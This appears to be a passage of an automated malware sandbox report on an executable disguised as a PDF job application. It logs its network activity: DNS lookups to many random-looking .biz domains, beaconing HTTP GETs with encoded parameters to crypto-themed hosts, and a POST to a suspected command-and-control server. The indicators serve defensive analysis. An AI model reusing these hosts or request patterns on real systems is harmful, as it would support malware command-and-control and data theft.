            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_004722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_004722EE
            Source: global trafficHTTP traffic detected: GET /gymegolihltgvcqo?usid=24&utid=11154195932 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
            Source: global trafficHTTP traffic detected: GET /aosibypyx?usid=24&utid=11154196211 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
            Source: global trafficHTTP traffic detected: GET /j422/?46X=FUOfllrMHRVlL2mP9dpFtlJ7w5e63t2rBG4iChoHy9jO0xa6Gzw56eLBxdOIk/dIKvPqMZj+oWY7sauAPMCxWZArGu+MyfyU7LQKnbq/Om18e125mnYqe98=&iR=Nv5PUh6XCNMP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.minimalbtc.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /pyxq/?46X=voi6TgACTnyN5gbZYmU17u0h/VvpkraiSkSL1M3zbYGOCvXanSp74LpL3h0aAKQshQlyQ1kby8ogou9zAffBNKdsiowaI9GRahkqR5DXE2LnsscTpBmnflg=&iR=Nv5PUh6XCNMP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.deepwork.cafeConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /iynbmylcmibn?usid=24&utid=11154212164 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.fwiwk.biz
            Source: global trafficHTTP traffic detected: GET /4udu/?46X=QPOxO2JOSBeIkdRIJ7kHfEfpa4SAwF/WxXvhpqosjTHM3PFGv2TE4R55nnK/GVLmYbqeoCZ32Sz0NtXBeMrpNSAZ0hCamPuf4pMsJIkclL+7GyT0E55kVqE=&iR=Nv5PUh6XCNMP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.dresses-executive.sbsConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /7bzp/?46X=aR6WdwHaaPmew49IGl9c2CyrORGhdUxKRjpfDDDEmaIVpXDnsjMmJ0s7T5q7/mJAEyjBMk5h7mx5tXd7udb6EMTlIvch2q9+PHlpJuVOHss5uOhsYNovhdM=&iR=Nv5PUh6XCNMP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.dappbtc.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /gwo6/?46X=MBEKEv0ugpgWX2jua16KbRtCIB3s6ka+zKgBsYRR8c9E1EzqhBu48/qzeTOQx3bSOlhdcb/rXf0aputkyH2GEaaTMgSCSx6h1rRpE7wz+fc0QC+fndBMDtU=&iR=Nv5PUh6XCNMP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.stakemask.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bguu/?46X=wpZ2zrhVCI3JLgG0fmBBss6LPjHlWe1w/JFFDzKF+V7h32CQ3OMTdOkGE8NCHKIXe6YEJzSxYnSm/JZ2Z7T7gNAl4zG8Smso5QFplpDKnUXP2BcIMSrtmpg=&iR=Nv5PUh6XCNMP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.agistaking.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /gtvh/?46X=svsS4k9aWb1fxOJWFdqD4ZHZO8ProC7QnMiFRAA+Jn47YSp+JrMAdMKfG3E9ev5xwfTou5frDELSSoA0/vSCvrqCDlCfzUQB/UWtrKGfrZiks1Cnj9TArQE=&iR=Nv5PUh6XCNMP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.leadmagnetkpis.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /9x20/?46X=lomPZfbkX5/Tg+6jmw8dyMDkjP4NXk0abi78pjf9+/jRa8r0UKnkgOsbdV67hnlDhoKnZ5+zibRYdRwwM6kGhJJ3GpxF1D+e7zNnDN/YPp88POfC8mTtY1w=&iR=Nv5PUh6XCNMP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.publicblockchain.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
            Source: global trafficDNS traffic detected: DNS query: ssbzmoy.biz
            Source: global trafficDNS traffic detected: DNS query: cvgrf.biz
            Source: global trafficDNS traffic detected: DNS query: npukfztj.biz
            Source: global trafficDNS traffic detected: DNS query: przvgke.biz
            Source: global trafficDNS traffic detected: DNS query: ww7.przvgke.biz
            Source: global trafficDNS traffic detected: DNS query: zlenh.biz
            Source: global trafficDNS traffic detected: DNS query: knjghuig.biz
            Source: global trafficDNS traffic detected: DNS query: uhxqin.biz
            Source: global trafficDNS traffic detected: DNS query: anpmnmxo.biz
            Source: global trafficDNS traffic detected: DNS query: lpuegx.biz
            Source: global trafficDNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
            Source: global trafficDNS traffic detected: DNS query: www.minimalbtc.xyz
            Source: global trafficDNS traffic detected: DNS query: vjaxhpbji.biz
            Source: global trafficDNS traffic detected: DNS query: www.deepwork.cafe
            Source: global trafficDNS traffic detected: DNS query: xlfhhhm.biz
            Source: global trafficDNS traffic detected: DNS query: ifsaia.biz
            Source: global trafficDNS traffic detected: DNS query: saytjshyf.biz
            Source: global trafficDNS traffic detected: DNS query: vcddkls.biz
            Source: global trafficDNS traffic detected: DNS query: www.dresses-executive.sbs
            Source: global trafficDNS traffic detected: DNS query: fwiwk.biz
            Source: global trafficDNS traffic detected: DNS query: ww12.fwiwk.biz
            Source: global trafficDNS traffic detected: DNS query: tbjrpv.biz
            Source: global trafficDNS traffic detected: DNS query: deoci.biz
            Source: global trafficDNS traffic detected: DNS query: gytujflc.biz
            Source: global trafficDNS traffic detected: DNS query: qaynky.biz
            Source: global trafficDNS traffic detected: DNS query: bumxkqgxu.biz
            Source: global trafficDNS traffic detected: DNS query: dwrqljrr.biz
            Source: global trafficDNS traffic detected: DNS query: nqwjmb.biz
            Source: global trafficDNS traffic detected: DNS query: ytctnunms.biz
            Source: global trafficDNS traffic detected: DNS query: myups.biz
            Source: global trafficDNS traffic detected: DNS query: oshhkdluh.biz
            Source: global trafficDNS traffic detected: DNS query: www.dappbtc.xyz
            Source: global trafficDNS traffic detected: DNS query: yunalwv.biz
            Source: global trafficDNS traffic detected: DNS query: jpskm.biz
            Source: global trafficDNS traffic detected: DNS query: lrxdmhrr.biz
            Source: global trafficDNS traffic detected: DNS query: wllvnzb.biz
            Source: global trafficDNS traffic detected: DNS query: gnqgo.biz
            Source: global trafficDNS traffic detected: DNS query: jhvzpcfg.biz
            Source: global trafficDNS traffic detected: DNS query: acwjcqqv.biz
            Source: global trafficDNS traffic detected: DNS query: lejtdj.biz
            Source: global trafficDNS traffic detected: DNS query: vyome.biz
            Source: global trafficDNS traffic detected: DNS query: yauexmxk.biz
            Source: global trafficDNS traffic detected: DNS query: iuzpxe.biz
            Source: global trafficDNS traffic detected: DNS query: sxmiywsfv.biz
            Source: global trafficDNS traffic detected: DNS query: vrrazpdh.biz
            Source: global trafficDNS traffic detected: DNS query: www.stakemask.xyz
            Source: global trafficDNS traffic detected: DNS query: ftxlah.biz
            Source: global trafficDNS traffic detected: DNS query: typgfhb.biz
            Source: global trafficDNS traffic detected: DNS query: esuzf.biz
            Source: global trafficDNS traffic detected: DNS query: gvijgjwkh.biz
            Source: global trafficDNS traffic detected: DNS query: qpnczch.biz
            Source: global trafficDNS traffic detected: DNS query: brsua.biz
            Source: global trafficDNS traffic detected: DNS query: dlynankz.biz
            Source: global trafficDNS traffic detected: DNS query: oflybfv.biz
            Source: global trafficDNS traffic detected: DNS query: yhqqc.biz
            Source: global trafficDNS traffic detected: DNS query: mnjmhp.biz
            Source: global trafficDNS traffic detected: DNS query: opowhhece.biz
            Source: global trafficDNS traffic detected: DNS query: zjbpaao.biz
            Source: global trafficDNS traffic detected: DNS query: jdhhbs.biz
            Source: global trafficDNS traffic detected: DNS query: www.agistaking.xyz
            Source: global trafficDNS traffic detected: DNS query: mgmsclkyu.biz
            Source: global trafficDNS traffic detected: DNS query: warkcdu.biz
            Source: global trafficDNS traffic detected: DNS query: gcedd.biz
            Source: global trafficDNS traffic detected: DNS query: jwkoeoqns.biz
            Source: global trafficDNS traffic detected: DNS query: xccjj.biz
            Source: global trafficDNS traffic detected: DNS query: hehckyov.biz
            Source: global trafficDNS traffic detected: DNS query: rynmcq.biz
            Source: global trafficDNS traffic detected: DNS query: uaafd.biz
            Source: global trafficDNS traffic detected: DNS query: eufxebus.biz
            Source: global trafficDNS traffic detected: DNS query: pwlqfu.biz
            Source: global trafficDNS traffic detected: DNS query: rrqafepng.biz
            Source: global trafficDNS traffic detected: DNS query: www.leadmagnetkpis.shop
            Source: global trafficDNS traffic detected: DNS query: ctdtgwag.biz
            Source: global trafficDNS traffic detected: DNS query: tnevuluw.biz
            Source: global trafficDNS traffic detected: DNS query: whjovd.biz
            Source: global trafficDNS traffic detected: DNS query: gjogvvpsf.biz
            Source: global trafficDNS traffic detected: DNS query: reczwga.biz
            Source: global trafficDNS traffic detected: DNS query: bghjpy.biz
            Source: global trafficDNS traffic detected: DNS query: damcprvgv.biz
            Source: global trafficDNS traffic detected: DNS query: ocsvqjg.biz
            Source: global trafficDNS traffic detected: DNS query: ywffr.biz
            Source: global trafficDNS traffic detected: DNS query: www.publicblockchain.xyz
            Source: global trafficDNS traffic detected: DNS query: www.fresart.website
            Source: unknownHTTP traffic detected: POST /idtdeni HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 862
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 14 Mar 2025 07:24:17 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 14 Mar 2025 07:24:17 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 14 Mar 2025 07:24:25 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 14 Mar 2025 07:24:25 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Fri, 14 Mar 2025 07:24:45 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Fri, 14 Mar 2025 07:24:45 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
